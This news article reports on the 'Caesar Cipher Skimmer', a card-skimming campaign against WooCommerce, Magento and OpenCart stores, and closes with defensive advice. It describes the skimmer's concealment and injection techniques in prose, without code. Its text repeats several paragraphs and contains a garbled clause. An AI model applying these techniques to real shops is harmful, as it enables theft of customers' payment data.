Caesar Cipher Skimmer Used to Compromise E-stores Based on Popular CMS

Recent weeks have seen a new variation of the "gtag" credit card skimming attack with a high number of detections, named by Sucuri researchers as the "Caesar Cipher Skimmer". This new skimmer is notably being deployed across various popular content management systems (CMS) simultaneously, including WordPress, Magento, and OpenCart.

This latest campaign involves maliciously modifying the checkout PHP page of the WooCommerce plugin for WordPress to steal credit card data. Sucuri researchers have noted that while it is common to see malware recycled between CMS, it is unusual to see it deployed across various platforms simultaneously.

Threat actors used the substitution mechanism of the Caesar cipher to encode the malware and conceal the domain hosting the malicious payload. This is achieved by subtracting the value of each unicode character by three, using a technique to encode a string and make it harder to read.

The domain hosting the malicious code was likely compromised in previous attacks, but researchers also observed the use of rogue sites set up by the attackers. The attackers registered some domains with intentional spelling mistakes, which suggests that they intend to swap out domains when they are discovered by security vendors.

The script employed in the campaign loads another layer of obfuscated skimmer JavaScript, which creates a WebSocket, connects to a remote server, and waits to receive the second layer of the skimmer. This script sends the URL of the current page, allowing the attackers to send customized responses for each infected site.

Researchers noted that some versions of the second-layer script even check if it is loaded by a logged-in WordPress user and modify the response for them, indicating advanced malware capabilities. Comments written in Russian were found in older script versions, suggesting that speaks Russian may be behind the attacks.

In recent months, injections have been modified to appear less suspicious by mimicking Google Analytics and Google Tag Manager. The experts also observed attackers misusing the Insert Headers and Footers WPCode plugin to insert malware into WooCommerce websites.

On Magento websites, attackers frequently use the core_config_data database table to store credit card skimming JavaScript, but no specific cases have yet been seen for OpenCart. Users are advised to keep their sites up to date, review admin accounts, keep passwords updated, leverage file integrity and website monitoring, and protect their sites with a web application firewall.

Sucuri researchers wrote in a recent post that "Caesar Cipher Skimmer" is used to compromise multiple CMS, including WordPress, Magento, and OpenCart. The post also stated that the malware campaign involves maliciously modifying the checkout PHP page of the WooCommerce plugin for WordPress to steal credit card data.

Sucuri researchers also observed attackers misusing the Insert Headers and Footers WPCode plugin to insert malware into WooCommerce websites. This plugin has become popular among attackers for inserting server-side redirects.

On Magento websites, attackers frequently use the core_config_data database table to store credit card skimming JavaScript. However, specific cases have not yet been seen for OpenCart. Users are advised to keep their sites up to date, review admin accounts and keep passwords updated, leverage file integrity and website monitoring, and protect their sites with a web application firewall.

Read more